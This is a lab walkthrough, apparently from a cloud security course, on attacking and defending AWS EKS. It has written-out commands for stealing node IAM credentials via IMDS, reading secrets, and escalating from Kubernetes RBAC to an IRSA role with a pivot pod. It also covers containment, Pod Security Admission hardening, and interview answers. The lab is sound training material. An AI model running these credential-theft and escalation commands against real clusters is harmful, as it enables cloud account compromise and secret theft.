Scenario: The Same Heist, One Layer Up — Attacking and Defending EKS
The ir-scenario lab popped an EC2 box and stole its role through
the metadata service. EKS changes the shape of that attack without changing the
ending. Now the "box" is a pod, the "role" can be assumed three different ways, and
there's a whole second authorization system — Kubernetes RBAC — sitting between the
attacker and the cloud account. This lab walks all of it: how a pod gets AWS power,
how an in-cluster identity escalates to cloud compromise, how you contain a bad pod,
and how admission control would have stopped it.
Last verified2026-06
Read this once, then run the four exercises with the cluster up.
First: the three ways a pod can hold AWS credentials
This is the single most important EKS security concept and a guaranteed interview question. A container in EKS can end up with AWS permissions through three very different paths — and they have wildly different blast radii.
1. NODE INSTANCE ROLE (the accident)
pod ──curl──► 169.254.169.254 (IMDS) ──► node's IAM role creds
• every pod on the node can reach it unless you block IMDS
• the pod inherits the NODE's permissions (ECR pull, CNI, SSM…), not its own
• this is the EC2 attack from ir-scenario, now launched from inside a container
2. IRSA — IAM Roles for Service Accounts (the intended way, pre-2023)
pod's ServiceAccount has a signed OIDC token ──► STS AssumeRoleWithWebIdentity
──► creds for a role whose TRUST POLICY names that exact ServiceAccount
• per-workload, least-privilege — IF you scope the trust + permissions tightly
• the SA annotation eks.amazonaws.com/role-arn is the wiring
3. EKS POD IDENTITY (the newer way, 2023+)
an EKS agent + a "Pod Identity Association" maps SA -> role; no OIDC annotation
• same idea as IRSA, simpler trust model; not used in this lab but name-drop itMemory hookOne-linerIn EKS a pod gets AWS creds three ways — by accident off the node's IMDS, on purpose via IRSA's OIDC token, or via the newer Pod Identity agent. The accident gives it the node's role; the other two give it its own.
This lab builds path 1 (weakened IMDS) and path 2 (an over-broad IRSA role) so you can run both and compare what each yields.
How IRSA actually works (path 2, in detail)
pod (webapp-sa) EKS OIDC issuer STS IAM
│ projected JWT signed by the cluster │ │
│ (mounted at /var/run/secrets/eks.amazonaws.com/...)│ │
│ │ │
│ AssumeRoleWithWebIdentity(roleArn, token) │ │
├────────────────────────────────────────────────────►│ │
│ │ 1. is the OIDC │
│ │ issuer a │
│ │ registered │
│ │ provider? ├──┐
│ │ 2. does the role's│ │
│ │ trust policy │◄─┘
│ │ allow this │
│ │ sub (the SA)? │
│ { ASIA…, Secret, SessionToken, Expiration } │ 3. yes → mint │
│◄────────────────────────────────────────────────────┤ role creds │
▼
pod now calls AWS as assumed-role/eks-lab-webapp-overbroad/botocore-session-…The AWS SDK inside the pod does this automatically — it sees the AWS_ROLE_ARN and
AWS_WEB_IDENTITY_TOKEN_FILE env vars the EKS webhook injected (because of the SA
annotation) and performs the exchange on the first API call. Just like ir-scenario,
no static keys touch disk, and the credential is a temporary ASIA… STS cred.
Tie-back to cloudtrail-detectionthat
AssumeRoleWithWebIdentityis a CloudTrail event. So is everything the role then does. The detection lab's "01 - who assumed which role" Athena query surfaces this exact pivot.
Exercise A — IRSA + IMDS theft (attacker view)
Goal: see the legitimate IRSA path, then the illegitimate IMDS path, and compare.
# [laptop] exec into the webapp pod (this is "attacker has code-exec in the app")
POD=$(kubectl -n apps get pod -l app=webapp -o name)
kubectl -n apps exec -it "$POD" -- sh# [inside the pod] PATH 2 — the role this workload was GIVEN via IRSA:
aws sts get-caller-identity
# → assumed-role/eks-lab-webapp-overbroad/... (its own IRSA role — an ASIA… cred)
# the over-broad role can read the "production secret" and enumerate the account:
aws ssm get-parameter --name /eks-lab/prod/db-password --with-decryption \
--query Parameter.Value --output text # → L4b-Pl@ceholder-NotReal
aws s3 ls # → every bucket in the account
aws iam list-users # → full IAM enumeration
# PATH 1 — now steal the NODE's role straight off IMDS (the ir-scenario attack,
# from inside a container). IMDSv1 is allowed and hop-limit is 2, so a plain GET works:
command -v curl || dnf install -y curl-minimal # the image may not ship curl
ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
echo "node role: $ROLE"
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE
# → AccessKeyId / SecretAccessKey / Token for the NODE's role (eks-lab-node)
exitLessonthe pod has two identities available — its scoped IRSA role and, by
reaching IMDS, the node's role. The node role here is modest (ECR/CNI/SSM), but on
many clusters it's over-granted, and reaching it lets one pod act as the node and
therefore touch every other pod's secrets. The fix (Exercise D) is to block pod→IMDS.
And note the IRSA role is itself the problem this time: a web app got s3:* +
iam:List* — over-broad IRSA = account-wide blast radius, exactly like the EC2
role two labs ago.
Exercise B — In-cluster RBAC privilege escalation
Goal: a Kubernetes identity that "only deploys apps" becomes full cloud compromise — purely through over-permissive RBAC. This is the attack that has no EC2 equivalent.
# [laptop] Mint a token for the ci-deployer ServiceAccount (simulating a stolen SA
# token / a workload running as ci-deployer) and see what it can do:
TOKEN=$(kubectl -n apps create token ci-deployer)
kubectl --token="$TOKEN" -n apps auth can-i --list | grep -Ei 'secret|pod|exec'
# → it can get/list secrets, create pods, and create pods/exec. Too much.
# 1) Direct: read the in-cluster secret it should never see
kubectl --token="$TOKEN" -n apps get secret app-secrets -o jsonpath='{.data.db-password}' | base64 -d
# → in-cluster-secret-not-real
# 2) The bridge to CLOUD: create a pod that runs AS webapp-sa, inheriting its IRSA role.
# "I can create pods" + "I can pick the ServiceAccount" = I can borrow any role in
# the cluster. This is the RBAC -> IRSA -> AWS escalation.
cat <<'EOF' | kubectl --token="$TOKEN" -n apps apply -f -
apiVersion: v1
kind: Pod
metadata: { name: pivot, namespace: apps }
spec:
serviceAccountName: webapp-sa
containers:
- name: c
image: public.ecr.aws/aws-cli/aws-cli:latest
command: ["sleep","infinity"]
EOF
kubectl -n apps exec pivot -- aws sts get-caller-identity
# → assumed-role/eks-lab-webapp-overbroad/... — the deployer is now the cloud role.
kubectl -n apps delete pod pivotLessonKubernetes RBAC is a second authorization plane in front of your cloud
account, and create pods (with free choice of ServiceAccount) or pods/exec are
privilege-escalation primitives — they let a low-value identity borrow a
high-value one. Treat "can create/modify pods in a namespace that has powerful
ServiceAccounts" as equivalent to holding those SAs' permissions.
Detectablethis all lands in the EKS audit log (
terraform output control_plane_log_group).aws logs tail <group> --followwhile you run the above and you'll see thecreate podsandcreate tokenrequests, with the user.
Exercise C — Pod IR / containment
Goal: contain the compromised webapp pod without killing it (you want it alive for
forensics), then take the node out of service.
# [laptop] 1) NETWORK ISOLATION — label the pod so the `quarantine` NetworkPolicy
# (deny all ingress+egress) selects it. Requires VPC CNI policy enforcement, which
# the Terraform enabled.
POD=$(kubectl -n apps get pod -l app=webapp -o jsonpath='{.items[0].metadata.name}')
kubectl -n apps label pod "$POD" quarantine=isolate
# prove containment: the pod can no longer reach AWS / the internet, but is still alive
kubectl -n apps exec "$POD" -- sh -c 'aws sts get-caller-identity --cli-connect-timeout 5 || echo CONTAINED'
# → CONTAINED (network calls time out; you can still exec/log — that's the API server)
# 2) REVOKE THE CLOUD IDENTITY — pull the IRSA role out from under the pod by removing
# the SA annotation (new token exchanges fail; existing creds die at expiry).
kubectl -n apps annotate sa webapp-sa eks.amazonaws.com/role-arn-
# 3) NODE ISOLATION — cordon (no new pods) then drain (evict existing) for forensics:
NODE=$(kubectl get nodes -o jsonpath='{.items[0].metadata.name}')
kubectl cordon "$NODE"
kubectl drain "$NODE" --ignore-daemonsets --delete-emptydir-data --force
# (for disk/memory forensics on the node itself, Session-Manager onto it — the node
# role has AmazonSSMManagedInstanceCore: aws ssm start-session --target <instance-id>)Lessoncontainment in Kubernetes has layers — network (NetworkPolicy), identity (revoke IRSA), and node (cordon/drain), and you reach for them in that order to stop the bleeding while preserving evidence. Mirrors ir-scenario's "isolate the instance" step, but you isolate the pod first because that's the smallest blast radius.
Exercise D — Admission control & hardening
Goal: the controls that would have blocked all of the above. Built-in Pod Security Admission needs no extra components — just namespace labels.
# [laptop] apply the restricted namespace + two pods (one bad, one good):
kubectl apply -f k8s/40-psa-restricted.yamlThe good-pod is admitted. The bad-pod is rejected at admission (before it's
ever scheduled) with a restricted:latest violation listing six problems:
| What the API server reports | The offending field in bad-pod | Profile level |
|---|---|---|
privileged must not be true | privileged: true | baseline (the strongest) |
allowPrivilegeEscalation != false | allowPrivilegeEscalation: true | restricted |
runAsUser=0 not allowed | runAsUser: 0 | restricted |
runAsNonRoot != true | (never set) | restricted |
unrestricted capabilities | no capabilities.drop: ["ALL"] | restricted |
seccompProfile not set | no seccompProfile.type | restricted |
The first (privileged) alone is enough to reject it; the other five are the
tighten-ups restricted layers on top of baseline. The good-pod flips exactly
those fields, so it's admitted. Label your real namespaces the same way:
kubectl label ns apps pod-security.kubernetes.io/warn=restricted # warn first
# then, once workloads comply:
kubectl label ns apps pod-security.kubernetes.io/enforce=restricted --overwriteThe other two hardening moves, tied to Exercises A and C:
# Fix path-1 IMDS theft: stop pods reaching the node's metadata service.
# In eks-nodes.tf set http_tokens="required" and http_put_response_hop_limit=1, then:
terraform apply # new launch-template version; recycle the node group to take effect
# Default-deny egress so a popped pod can't phone home or hit IMDS in the first place:
kubectl apply -f k8s/35-default-deny-egress.yaml # all-pods deny-egress, DNS allowed (breaks AWS calls on purpose)LessonPod Security Admission (free, built-in) blocks the privileged/root pods that make node escape easy; IMDSv2 + hop-limit-1 closes path 1; default-deny egress closes exfiltration. Kyverno or OPA/Gatekeeper are the step-up when you need policies PSS can't express (e.g. "only images from our registry") — but start with PSS.
Interview Q&A
Three ways — it reached the node's metadata service and inherited the node instance role, it used IRSA (its ServiceAccount's OIDC token traded at STS for a scoped role), or the newer EKS Pod Identity agent. The dangerous one is the node role via IMDS, because every pod on the node can reach it unless you block it, and it gives the pod the node's permissions rather than its own — so you lose per-workload least privilege. The fix is IMDSv2 with hop-limit 1 plus a scoped IRSA role per workload.
The cluster has an OIDC issuer registered as an IAM identity provider. A pod's ServiceAccount gets a short-lived signed JWT projected into it; the AWS SDK calls STS AssumeRoleWithWebIdentity with that token, and STS hands back temporary role credentials — but only if the role's trust policy names that exact ServiceAccount in its sub condition. So the trust is anchored in the cluster's OIDC signature, and the scoping lives in the role trust policy, which is why a wildcard sub there is so dangerous.
RBAC verbs like create pods or pods/exec are privilege- escalation primitives — if I can create a pod and choose its ServiceAccount, I can launch a pod as a powerful IRSA ServiceAccount and inherit its IAM role, and if I can exec into an existing pod I can use whatever credentials it holds. So a "just deploys apps" identity becomes whatever the most powerful ServiceAccount in that namespace can do in AWS. The lesson is to treat pod-create/exec in a namespace with privileged ServiceAccounts as equivalent to holding those roles.
Isolate in layers, smallest blast radius first: apply a deny-all NetworkPolicy by labelling the pod so it can't reach AWS or move laterally, but leave it running so you keep memory and process state; revoke its cloud identity by stripping the IRSA annotation so new credential exchanges fail; then cordon and drain the node and acquire it via Session Manager for disk/memory forensics. You avoid kubectl delete, which would throw away the evidence.
On a stock EKS cluster the VPC CNI accepts NetworkPolicy objects but doesn't enforce them — your "default-deny" silently does nothing. You have to enable enforcement in the VPC CNI addon (enableNetworkPolicy=true, CNI 1.14+) or run Calico. It's a classic false sense of security: the policy is "applied" and shows in kubectl get netpol, but traffic still flows until enforcement is on.
Built-in Pod Security Admission — just label the namespace pod-security.kubernetes.io/enforce: restricted and the API server rejects privileged, root, or capability-laden pods at admission, no extra components. Roll it out as warn first to find violators, then flip to enforce. Reach for Kyverno or OPA/Gatekeeper only when you need rules PSS can't express, like restricting images to an approved registry.